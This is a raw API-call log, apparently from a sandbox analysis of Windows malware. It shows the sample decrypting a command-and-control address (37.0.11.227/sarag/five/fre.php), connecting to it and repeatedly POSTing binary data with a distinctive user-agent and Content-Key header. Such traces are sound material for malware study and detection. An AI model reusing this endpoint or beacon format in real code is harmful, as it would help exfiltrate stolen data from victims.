LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.781] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0250.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.782] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0250.782] GetProcessHeap () returned 0x690000 [0250.782] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0250.782] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0250.782] GetProcessHeap () returned 0x690000 [0250.782] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0250.782] socket (af=2, type=1, protocol=6) returned 0x6f4 [0250.783] connect (s=0x6f4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0250.808] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0250.808] GetProcessHeap () returned 0x690000 [0250.808] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0250.809] GetProcessHeap () returned 0x690000 [0250.809] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0250.810] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0250.810] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0250.810] GetProcessHeap () returned 0x690000 [0250.810] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0250.810] GetProcessHeap () returned 0x690000 [0250.811] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0250.811] GetProcessHeap () returned 0x690000 [0250.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0250.811] GetProcessHeap () returned 0x690000 [0250.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0250.812] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0250.813] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0250.813] GetProcessHeap () returned 0x690000 [0250.813] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0250.813] GetProcessHeap () returned 0x690000 [0250.813] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0250.813] send (s=0x6f4, buf=0x6ad508*, len=242, flags=0) returned 242 [0250.814] send (s=0x6f4, buf=0x6aba40*, len=159, flags=0) returned 159 [0250.814] GetProcessHeap () returned 0x690000 [0250.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0250.814] recv (in: s=0x6f4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0250.885] GetProcessHeap () returned 0x690000 [0250.885] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0250.885] GetProcessHeap () returned 0x690000 [0250.886] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0250.886] GetProcessHeap () returned 0x690000 [0250.887] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0250.887] GetProcessHeap () returned 0x690000 [0250.887] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0250.887] closesocket (s=0x6f4) returned 0 [0250.888] GetProcessHeap () returned 0x690000 [0250.888] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0250.888] GetProcessHeap () returned 0x690000 [0250.888] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0250.888] GetProcessHeap () returned 0x690000 [0250.889] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0250.889] GetProcessHeap () returned 0x690000 [0250.889] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0250.889] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1450) returned 0x6f4 [0250.891] Sleep (dwMilliseconds=0xea60) [0250.892] GetProcessHeap () returned 0x690000 [0250.892] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0250.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.894] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0250.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.899] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0250.905] GetProcessHeap () returned 0x690000 [0250.905] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0250.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.906] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0250.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.907] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0250.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.908] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.908] GetProcessHeap () returned 0x690000 [0250.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0250.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.931] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0250.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.936] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0250.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.938] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0250.938] GetProcessHeap () returned 0x690000 [0250.938] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0250.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.939] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0250.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.940] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0250.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.941] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0250.942] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.942] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0250.942] GetProcessHeap () returned 0x690000 [0250.942] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0250.942] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0250.943] GetProcessHeap () returned 0x690000 [0250.943] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0250.943] GetProcessHeap () returned 0x690000 [0250.944] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0250.944] GetProcessHeap () returned 0x690000 [0250.944] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0250.944] GetProcessHeap () returned 0x690000 [0250.944] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0250.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.946] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0250.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.952] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0250.959] GetProcessHeap () returned 0x690000 [0250.959] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0250.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.960] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0250.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.961] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0250.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.962] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.962] GetProcessHeap () returned 0x690000 [0250.962] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0250.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.963] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0250.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.964] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0250.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.966] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0250.966] GetProcessHeap () returned 0x690000 [0250.966] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0250.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.967] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0250.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.969] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0250.969] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.970] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0250.970] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.971] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0250.971] GetProcessHeap () returned 0x690000 [0250.971] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0250.971] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0250.971] GetProcessHeap () returned 0x690000 [0250.971] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3b0 [0250.971] socket (af=2, type=1, protocol=6) returned 0x6f8 [0250.971] connect (s=0x6f8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0250.998] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0250.998] GetProcessHeap () returned 0x690000 [0250.998] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0250.998] GetProcessHeap () returned 0x690000 [0250.998] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0250.999] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0251.000] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0251.000] GetProcessHeap () returned 0x690000 [0251.000] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0251.000] GetProcessHeap () returned 0x690000 [0251.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0251.001] GetProcessHeap () returned 0x690000 [0251.001] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0251.001] GetProcessHeap () returned 0x690000 [0251.001] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0251.002] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0251.003] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0251.003] GetProcessHeap () returned 0x690000 [0251.003] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0251.003] GetProcessHeap () returned 0x690000 [0251.003] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0251.004] send (s=0x6f8, buf=0x6ad508*, len=242, flags=0) returned 242 [0251.004] send (s=0x6f8, buf=0x6aba40*, len=159, flags=0) returned 159 [0251.004] GetProcessHeap () returned 0x690000 [0251.004] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0251.004] recv (in: s=0x6f8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0251.074] GetProcessHeap () returned 0x690000 [0251.075] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0251.075] GetProcessHeap () returned 0x690000 [0251.076] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0251.076] GetProcessHeap () returned 0x690000 [0251.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0251.077] GetProcessHeap () returned 0x690000 [0251.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0251.077] closesocket (s=0x6f8) returned 0 [0251.078] GetProcessHeap () returned 0x690000 [0251.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3b0 | out: hHeap=0x690000) returned 1 [0251.078] GetProcessHeap () returned 0x690000 [0251.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0251.078] GetProcessHeap () returned 0x690000 [0251.079] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0251.079] GetProcessHeap () returned 0x690000 [0251.079] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0251.080] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x145c) returned 0x6f8 [0251.081] Sleep (dwMilliseconds=0xea60) [0251.084] GetProcessHeap () returned 0x690000 [0251.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0251.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.085] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.092] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0251.097] GetProcessHeap () returned 0x690000 [0251.097] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0251.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.098] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0251.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.099] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.100] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.100] GetProcessHeap () returned 0x690000 [0251.100] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0251.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.104] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0251.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.105] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0251.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.106] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0251.106] GetProcessHeap () returned 0x690000 [0251.106] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0251.106] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.107] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0251.107] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.107] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0251.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.108] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0251.109] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.109] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0251.109] GetProcessHeap () returned 0x690000 [0251.109] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0251.109] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0251.109] GetProcessHeap () returned 0x690000 [0251.110] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0251.110] GetProcessHeap () returned 0x690000 [0251.110] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0251.110] GetProcessHeap () returned 0x690000 [0251.110] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0251.110] GetProcessHeap () returned 0x690000 [0251.110] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0251.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.111] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.118] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0251.123] GetProcessHeap () returned 0x690000 [0251.123] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0251.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.124] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0251.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.125] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.125] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.125] GetProcessHeap () returned 0x690000 [0251.126] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0251.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.127] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0251.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.129] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0251.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.129] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0251.129] GetProcessHeap () returned 0x690000 [0251.130] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0251.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.130] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0251.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.131] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0251.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.132] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0251.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.133] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0251.133] GetProcessHeap () returned 0x690000 [0251.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0251.133] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0251.133] GetProcessHeap () returned 0x690000 [0251.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0251.133] socket (af=2, type=1, protocol=6) returned 0x6fc [0251.133] connect (s=0x6fc, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 